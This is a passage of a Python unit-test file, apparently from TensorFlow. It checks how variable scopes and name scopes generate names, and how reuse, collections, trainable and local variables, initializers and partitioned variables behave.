with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOriginalNameScope(self):
with self.cached_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeObjectReuse(self):
with self.cached_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, self.evaluate(x))
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
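      # Default-name uniquification is per exact name, so "defaultScope" below
      # does not advance the counter used for "defaultScope1".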
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "scope/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
      # Recheck: no new name scope was created by the variable scope above.
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
        # Recheck: no new name scope was created by the variable scope above.
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
      # Recheck: no new name scope was created by the variable scope above.
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
        # Recheck: no new name scope was created by the variable scope above.
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name,
"outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
# (different assertions failing after wrapping, in both execution modes)
@test_util.run_in_graph_and_eager_modes
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
# Since variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSignatureGetVarVsGetLocalVar(self):
"""get_{local,}variable() must take the same list of args."""
arg_names = tf_inspect.getargspec(variable_scope.get_variable)[0]
local_arg_names = tf_inspect.getargspec(
variable_scope.get_local_variable)[0]
self.assertEqual(arg_names, local_arg_names)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetCollection(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetTrainableVariablesWithGetVariable(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.get_variable(
"testGetTrainableVariables_d", [],
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
        # All other sync values set trainable=True.
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetTrainableVariablesWithVariable(self):
with self.cached_session():
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_a")
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_b")
_ = variable_scope.variable(
1.0, name="testGetTrainableVariables_c", trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_d",
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
        # All other sync values set trainable=True.
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetGlobalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testGetLocalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = variable_scope.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = variable_scope.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesUnprovidedArgsAndNoShape(self):
with self.assertRaisesRegexp(
ValueError,
"The initializer passed is not valid. It should be a callable with no "
"arguments and the shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be fully defined."):
variable_scope.get_variable("foo", initializer=lambda x: [2])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
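# Partitioners used by the tests below. Each returns the number of shards per
# axis, e.g. [2, 1, 1] splits axis 0 of a 3-D variable into two parts.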
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part
def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part
def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part
class VariableScopeWithPartitioningTest(test.TestCase):
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_deprecated_v1
def testResultNameMatchesRequested(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions "
".* and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
